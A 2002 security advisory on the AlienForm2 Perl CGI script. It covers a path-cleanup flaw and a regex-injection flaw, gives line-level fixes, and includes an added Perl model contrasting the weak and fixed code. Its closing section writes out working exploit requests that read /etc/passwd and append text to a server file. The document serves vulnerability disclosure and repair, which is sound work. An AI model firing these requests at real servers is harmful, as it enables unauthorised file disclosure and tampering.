
AlienForm2 revision 1.5

by Nikola Strahija on June 11th, 2002

AlienForm2 by Jon Hedley is a template-driven form processing Perl CGI script. It is normally installed as af.cgi or alienform.cgi. Template files on the server are used to configure the format of the output document, the name of a log file and the format of the data to append to the log file.


AlienForm2 is published under a licence that does not allow me to
reproduce parts of it here without permission, which I have been
unable to obtain. This advisory is best read in conjunction with a
copy of af.cgi.

The paths to the template files come from CGI inputs, and a flaw in
the code that cleans up those inputs allows any file on the server to
be used as a template file. The cleanup code replaces bad characters
and constructs with the empty string, and the input string ".|./" is
transformed by the cleanup code to "../".

The path cleanup code can be found on lines 185, 186, 197 and 198 of
af.cgi.

The name of a CGI input in square brackets in a template is replaced
with the value of that input. The regular expression which performs
the replacement is not resilient to regular expression metacharacters
in the name of a CGI input, allowing an attacker to take full control
of the contents of a template after CGI input substitution.

The CGI input substitution code can be found on line 246 of af.cgi.


Suggested Fix
=============

On lines 185 and 197, change [] to [_]

On lines 186 and 198, change // to /_/

On lines 246 and 248, change $key to \Q$key\E
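To make the two flaws and the suggested fixes concrete, the following is an added Perl model (not code from af.cgi) that puts a weak cleanup and substitution beside the fixed versions. The cleanup rules are assumed, since the advisory does not reproduce af.cgi's own, and are chosen only to show the ".|./" to "../" behaviour described above; the template and input values are constructed.

```perl
#!/usr/bin/perl
# Added example, not code from af.cgi: a model of the two flaws in the
# advisory and of the suggested fixes. The cleanup rules are assumed
# (af.cgi's own rules are not reproduced here); they are chosen only to
# show the ".|./" -> "../" behaviour the advisory describes.
use strict;
use warnings;

# Assumed cleanup: strip "../" constructs, then strip bad characters,
# both with the empty string. Deleting "|" after the "../" check lets
# the remaining characters join into the construct that was filtered.
sub clean_path_weak {
    my ($p) = @_;
    $p =~ s/\.\.\///g;     # remove traversal constructs
    $p =~ s/[^\w.\/-]//g;  # remove anything outside a safe character set
    return $p;
}

# Suggested fix: replace with "_" instead of deleting, so removed text
# leaves a marker and neighbouring characters can never join.
sub clean_path_fixed {
    my ($p) = @_;
    $p =~ s/\.\.\//_/g;
    $p =~ s/[^\w.\/-]/_/g;
    return $p;
}

# Template substitution: "[name]" becomes the value of CGI input "name".
# Weak form: the input name is interpolated into the pattern as a regex.
sub substitute_weak {
    my ($tpl, $key, $val) = @_;
    $tpl =~ s/\[$key\]/$val/g;
    return $tpl;
}

# Suggested fix: \Q...\E quotes every metacharacter in the input name,
# so only the literal text "[name]" can match.
sub substitute_fixed {
    my ($tpl, $key, $val) = @_;
    $tpl =~ s/\[\Q$key\E\]/$val/g;
    return $tpl;
}

# Constructed demonstration values (no real server involved).
print clean_path_weak('.|./.|./etc/passwd'),  "\n";  # ../../etc/passwd
print clean_path_fixed('.|./.|./etc/passwd'), "\n";  # ._./._./etc/passwd

my $tpl = "Dear [name],\nYour order has shipped.\n";
my $key = 'x|Dear.*|x';   # an input name that is also a regex alternation
print substitute_weak($tpl, $key, 'rewritten');   # first line replaced
print substitute_fixed($tpl, $key, 'rewritten');  # template unchanged
```

The weak substitution rewrites a line that contains no bracketed name at all, which is the behaviour the advisory calls "full control of the contents of a template"; with \Q...\E the same input name matches nothing.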


Exploits
========

Arbitrary file disclosure:

GET /cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd

File writing:

This proof of concept exploit appends the text "hello there" to the
file /tmp/foo on the web server. It requires the existence of the
file /tmp/passwd, consisting of just the three lines:

root:*:0:0:Charlie &:/root:/bin/csh
httpd:*:1004:1004:Apache daemon:/:/nonexistent
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin

This exploit can be readily adapted to use any other file of two or
more lines in place of /tmp/passwd, and the file disclosure
vulnerability could be used to find a suitable file. That process
could be automated.

GET /cgi-bin/af.cgi?_out_file=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Ftmp%2Fpasswd&x9|^root.*|x9=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Ftmp%2Ffoo&x9|^httpd.*|x9=hello+there&x9|^nobody.*%0A|x9=

=====================================================================

--
Nick Cleaton
[email protected]

